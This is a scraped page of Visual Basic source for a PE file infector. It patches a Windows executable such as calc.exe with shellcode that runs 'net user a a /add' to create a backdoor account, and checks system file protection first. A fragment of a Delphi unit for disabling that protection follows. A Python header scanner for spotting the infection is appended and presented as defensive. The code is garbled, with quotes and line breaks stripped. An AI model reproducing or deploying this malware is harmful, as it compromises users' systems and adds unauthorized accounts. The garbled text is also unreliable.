vb版感染源码.txt (VB PE infector source code)
1、vbgoodOption ExplicitPrivate Declare Function SfcIsFileProtected Lib sfc_os.dll Alias #5 _ (ByVal dwUnknown1 As Long, ByVal lpszFile As Long, ByVal dwUnknown2 As Long) As LongPrivate Sub Command1_Click()On Error GoTo 10Dim szFile As StringszFile = c:windowssystem32sethc.exe + vbNullCharIf SfcIsFileP
2、rotected(0, StrPtr(szFile), -1) = 0 ThenInfectPE c:windowssystem32calc.exe, cmd /c net user a a /addElseMsgBox xxEnd IfEnd SubPublic Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As LongDim i As Long, p As Long, q As Long, sHex As StringOn Error GoTo ERR: ShellcodesHex
3、 = 605583EC408BEC5564A1300000008B400C8B701CAD8B78088B473C8B54077803D78B4A188B5A2003 & _ DF498B348B03F7B847657450390675F1B8726F634139460475E78B5A2403DF668B0C4B8B5A1C03DF & _ 8B048B03C789454068786563006857696E455457FF55408945086A00680000000068000000006800 & _ 00000054FF550861E900000000For i = 0 To 132
4、 PatchCode(i) = Val(&H & Mid(sHex, i * 2 + 1, 2)Next iwinexecShellcodeIf Len(strRunFile) 12 Then MsgBox Shellcode, , MSGBOX: Exit FunctionIf Dir(strTargetFile) = Then MsgBox , , MSGBOX: Exit FunctionShellcodeFor i = 1 To 4 PatchCode(118 + i) = &H & Hex(Asc(Mid(strRunFile, i, 1)NextstrRunFile = Mid(s
5、trRunFile, 5)If Len(strRunFile) 4 Then For i = 1 To 4 PatchCode(113 + i) = &H & Hex(Asc(Mid(strRunFile, i, 1) Next strRunFile = Mid(strRunFile, 5) For i = 1 To Len(strRunFile) PatchCode(108 + i) = &H & Hex(Asc(Mid(strRunFile, i, 1) NextElse For i = 1 To Len(strRunFile) PatchCode(113 + i) = &H & Hex(
6、Asc(Mid(strRunFile, i, 1) NextEnd IfShellcodeNOption ExplicitPrivate Declare Sub CopyMemory Lib kernel32 Alias RtlMoveMemory (pDst As Any, pSrc As Any, ByVal ByteLen As Long)Private Type SectionHeaderName As String * 8RVA As LongVirtualSize As LongPhysicalSize As LongOffset As Longflags As LongEnd T
7、ypePrivate Const NeededArea As Long = 133Dim PE() As Byte, e_lfanew As Long, NumberOfSections As Long, SizeOfOptionalHeader As Long, AddressOfEntryPoint As Long, NumberOfRvaAndSizes As LongDim EncStart As Long, EncEnd As Long, SectionTableOffset As Long, SectionTable() As SectionHeader, EntrySection
8、 As Long, PaddingArea As Long, tmp As LongDim PatchCode(NeededArea - 1) As BytePublic Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As LongOn Error GoTo ERR: ShellcodePatchCode(0) = &H60PatchCode(1) = &H55PatchCode(2) = &H83PatchCode(3) = &HECPatchCode(4) = &H40PatchCo
9、de(5) = &H8BPatchCode(6) = &HECPatchCode(7) = &H55PatchCode(8) = &H64PatchCode(9) = &HA1PatchCode(10) = &H30PatchCode(11) = &H0PatchCode(12) = &H0PatchCode(13) = &H0PatchCode(14) = &H8BPatchCode(15) = &H40PatchCode(16) = &HCPatchCode(17) = &H8BPatchCode(18) = &H70PatchCode(19) = &H1CPatchCode(20) =
10、&HADPatchCode(21) = &H8BPatchCode(22) = &H78PatchCode(23) = &H8PatchCode(24) = &H8BPatchCode(25) = &H47PatchCode(26) = &H3CPatchCode(27) = &H8BPatchCode(28) = &H54PatchCode(29) = &H7PatchCode(30) = &H78PatchCode(31) = &H3PatchCode(32) = &HD7PatchCode(33) = &H8BPatchCode(34) = &H4APatchCode(35) = &H1
11、8PatchCode(36) = &H8BPatchCode(37) = &H5APatchCode(38) = &H20PatchCode(39) = &H3PatchCode(40) = &HDFPatchCode(41) = &H49PatchCode(42) = &H8BPatchCode(43) = &H34PatchCode(44) = &H8BPatchCode(45) = &H3PatchCode(46) = &HF7PatchCode(47) = &HB8PatchCode(48) = &H47PatchCode(49) = &H65PatchCode(50) = &H74P
12、atchCode(51) = &H50PatchCode(52) = &H39PatchCode(53) = &H6PatchCode(54) = &H75PatchCode(55) = &HF1PatchCode(56) = &HB8PatchCode(57) = &H72PatchCode(58) = &H6FPatchCode(59) = &H63PatchCode(60) = &H41PatchCode(61) = &H39PatchCode(62) = &H46PatchCode(63) = &H4PatchCode(64) = &H75PatchCode(65) = &HE7Pat
13、chCode(66) = &H8BPatchCode(67) = &H5APatchCode(68) = &H24PatchCode(69) = &H3PatchCode(70) = &HDFPatchCode(71) = &H66PatchCode(72) = &H8BPatchCode(73) = &HCPatchCode(74) = &H4BPatchCode(75) = &H8BPatchCode(76) = &H5APatchCode(77) = &H1CPatchCode(78) = &H3PatchCode(79) = &HDFPatchCode(80) = &H8BPatchC
14、ode(81) = &H4PatchCode(82) = &H8BPatchCode(83) = &H3PatchCode(84) = &HC7PatchCode(85) = &H89PatchCode(86) = &H45PatchCode(87) = &H40PatchCode(88) = &H68PatchCode(89) = &H78PatchCode(90) = &H65PatchCode(91) = &H63PatchCode(92) = &H0PatchCode(93) = &H68PatchCode(94) = &H57PatchCode(95) = &H69PatchCode
15、(96) = &H6EPatchCode(97) = &H45PatchCode(98) = &H54PatchCode(99) = &H57PatchCode(100) = &HFFPatchCode(101) = &H55PatchCode(102) = &H40PatchCode(103) = &H89PatchCode(104) = &H45PatchCode(105) = &H8PatchCode(106) = &H6APatchCode(107) = &H0PatchCode(108) = &H68PatchCode(109) = &H2EPatchCode(110) = &H65
16、PatchCode(111) = &H78PatchCode(112) = &H65PatchCode(113) = &H68PatchCode(114) = &H35PatchCode(115) = &H36PatchCode(116) = &H37PatchCode(117) = &H38PatchCode(118) = &H68PatchCode(119) = &H31PatchCode(120) = &H32PatchCode(121) = &H33PatchCode(122) = &H34PatchCode(123) = &H54PatchCode(124) = &HFFPatchC
17、ode(125) = &H55PatchCode(126) = &H8PatchCode(127) = &H61PatchCode(128) = &HE9winexecShellcodeDim i As Long, p As Long, q As LongIf Len(strRunFile) 12 Then MsgBox Shellcode, , MSGBOX: Exit FunctionIf Dir(strTargetFile) = Then MsgBox , , MSGBOX: Exit FunctionShellcodePatchCode(119) = &H & Hex(Asc(Mid(
18、strRunFile, 1, 1)PatchCode(120) = &H & Hex(Asc(Mid(strRunFile, 2, 1)PatchCode(121) = &H & Hex(Asc(Mid(strRunFile, 3, 1)PatchCode(122) = &H & Hex(Asc(Mid(strRunFile, 4, 1)strRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)If Len(strRunFile) 4 ThenFor i = 1 To 4PatchCode(113 + i) = &H & Hex(Asc(Mid(s
19、trRunFile, i, 1)NextstrRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)Dim j As IntegerFor j = 1 To Len(strRunFile)PatchCode(108 + j) = &H & Hex(Asc(Mid(strRunFile, j, 1)NextIf Len(strRunFile) 4 Then PatchCode(110 + Len(strRunFile) = &H0ElseIf Len(strRunFile) = 4 ThenFor i = 1 To 4PatchCode(113 + i
20、) = &H & Hex(Asc(Mid(strRunFile, i, 1)PatchCode(109) = &H0NextElseFor i = 1 To Len(strRunFile)PatchCode(113 + i) = &H & Hex(Asc(Mid(strRunFile, i, 1)NextPatchCode(114 + Len(strRunFile) = &H0End IfShellcodeNReDim PE(FileLen(strTargetFile) - 1) PEOpen strTargetFile For Binary As #1 PEGet #1, , PEClose
21、 #1e_lfanew = ReadDword(&H3C&)NumberOfSections = ReadWord(e_lfanew + 6)SizeOfOptionalHeader = ReadWord(e_lfanew + &H14&)AddressOfEntryPoint = ReadWord(e_lfanew + &H28&) If SizeOfOptionalHeader = &H60& ThenNumberOfRvaAndSizes = ReadDword(e_lfanew + &H74&)ElseNumberOfRvaAndSizes = 0End IfIf NumberOfRv
22、aAndSizes 16 Then NumberOfRvaAndSizes = 16If NumberOfRvaAndSizes (SizeOfOptionalHeader - &H60&) 8 Then NumberOfRvaAndSizes = (SizeOfOptionalHeader - &H60&) 8NumberOfRvaAndSizes = NumberOfRvaAndSizes - 1EncStart = 0: EncEnd = &H7FFFFFFFFor i = 0 To NumberOfRvaAndSizesp = ReadDword(e_lfanew + &H78& +
23、i * 8)q = p + ReadDword(e_lfanew + &H7C& + i * 8)If p q ThenExit FunctionElseIf p AddressOfEntryPoint And q = EncStart Then EncStart = q + 1ElseIf p AddressOfEntryPoint And q AddressOfEntryPoint ThenIf p = .RVA) And (AddressOfEntryPoint = .RVA + .VirtualSize) Then EntrySection = iEnd IfEnd WithNextI
24、f EntrySection = -1 Then Exit FunctionWith SectionTable(EntrySection)PaddingArea = .PhysicalSize - .VirtualSizeIf PaddingArea NeededArea ThenExit FunctionEnd IfFor i = .Offset + .VirtualSize To .Offset + .PhysicalSize - 1If PE(i) 0 ThenIf MsgBox(Padding Area seems to have data, do you really want to
25、 continue?, vbQuestion Or vbYesNo) = vbYes ThenExit ForElseExit FunctionEnd IfEnd IfNextIf .RVA EncStart Then EncStart = .RVAIf .RVA + .VirtualSize - 1 EncEnd Then EncEnd = .RVA + .VirtualSize - 1tmp = AddressOfEntryPoint - (.RVA + .VirtualSize + NeededArea)CopyMemory PatchCode(129), tmp, 4CopyMemor
26、y PE(.Offset + .VirtualSize), PatchCode(0), NeededAreaAddressOfEntryPoint = .RVA + .VirtualSizeWriteDword e_lfanew + &H28&, AddressOfEntryPoint.VirtualSize = .VirtualSize + NeededAreaWriteDword SectionTableOffset + EntrySection * &H28& + &H8&, .VirtualSize.flags = .flags Or &H80000000WriteDword Sect
27、ionTableOffset + EntrySection * &H28& + &H24&, .flagsEnd WithOpen strTargetFile & .exe For Binary As #1 Put #1, , PEClose #1InfectPE = 1Exit FunctionERR:InfectPE = 0End FunctionPrivate Function ReadWord(ByVal Offset As Long) As LongCopyMemory ReadWord, PE(Offset), 2End FunctionPrivate Function ReadD
28、word(ByVal Offset As Long) As LongCopyMemory ReadDword, PE(Offset), 4End FunctionPrivate Sub WriteDword(ByVal Offset As Long, ByVal Data As Long)CopyMemory PE(Offset), Data, 4End SubPrivate Function Add0To8(ByVal InputStr As String) As StringAdd0To8 = String(8 - Len(InputStr), 0) & InputStrEnd Funct
29、ionPrivate Function Read8Str(ByVal Offset As Long) As StringDim i As Long, c As Byte, s As StringFor i = 0 To 7c = PE(Offset + i)If c 127 Then c = 32s = s & Chr(c)NextRead8Str = sEnd FunctiondelhpiKillSFCunit KillSFC;interfaceusesWindows, SysUtils, WinLogonProcess;Function CloseSFC():Integer;impleme
30、ntationprocedure Root(VOID : Pointer); stdcall; forward;procedure EndRoot(); forward;function FixedPChar(const Value : PChar) : PChar;forward;typeTLoadLibraryA = function(lpLibFileName : PAnsiChar) : HMODULE; stdcall;TGetProcAddress = function(hModule : HMODULE; lpProcName : LPCSTR) : FARPROC; stdca
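The VB code above leaves two traces in the PE headers of the file it modifies: the entry-point section's VirtualSize grows by NeededArea (133 bytes) with AddressOfEntryPoint moved to that tail stub, and the section's Characteristics get 0x80000000 (IMAGE_SCN_MEM_WRITE) OR-ed in. The following header-level check is an added defensive example, not part of the page's source; the PE blobs are constructed header-only test data, and the only page-specific value it assumes is the 133-byte stub size.

```python
import struct

# Added defensive example (not the page's own code). It parses only the PE headers and
# flags the two header changes the infector makes to the entry-point section.
IMAGE_SCN_MEM_EXECUTE = 0x20000000  # standard Windows section flag values
IMAGE_SCN_MEM_WRITE = 0x80000000
STUB_SIZE = 133  # the page's NeededArea constant

def build_pe_headers(entry_rva, vsize, rawsize, flags):
    """Constructed header-only PE32 blob (test data, not a runnable program)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 0x10, entry_rva)                  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x5C, 16)                         # NumberOfRvaAndSizes
    sec = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", vsize, 0x1000, rawsize, 0x400, 0, 0, 0, 0, flags)
    return bytes(dos) + coff + bytes(opt) + sec

def scan_entry_section(pe):
    """Return heuristic findings about the section that contains AddressOfEntryPoint."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 0x14)[0]
    entry = struct.unpack_from("<I", pe, e_lfanew + 0x28)[0]  # offset the infector rewrites
    table = e_lfanew + 0x18 + opt_size                        # start of the section table
    findings = []
    for i in range(nsec):
        vsize, rva, rawsize, *_, flags = struct.unpack_from("<IIIIIIHHI", pe, table + i * 40 + 8)
        if not rva <= entry < rva + vsize:
            continue
        if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
            findings.append("entry section is both writable and executable")
        if rva + vsize - entry <= STUB_SIZE:
            findings.append("entry point lies in the last 133 bytes of its section")
        return findings
    return ["entry point is outside every section"]

CLEAN = build_pe_headers(0x1100, 0x800, 0xA00, 0x60000020)
# Headers as the infector would leave them: entry moved to the old end of .text,
# VirtualSize grown by the stub size, MEM_WRITE set on a code section.
SUSPECT = build_pe_headers(0x1800, 0x800 + STUB_SIZE, 0xA00, 0x60000020 | IMAGE_SCN_MEM_WRITE)

if __name__ == "__main__":
    print("clean:", scan_entry_section(CLEAN))
    print("suspect:", scan_entry_section(SUSPECT))
```

Both heuristics also fire on some legitimate packers and self-modifying binaries, so treat a hit as a triage signal rather than a verdict.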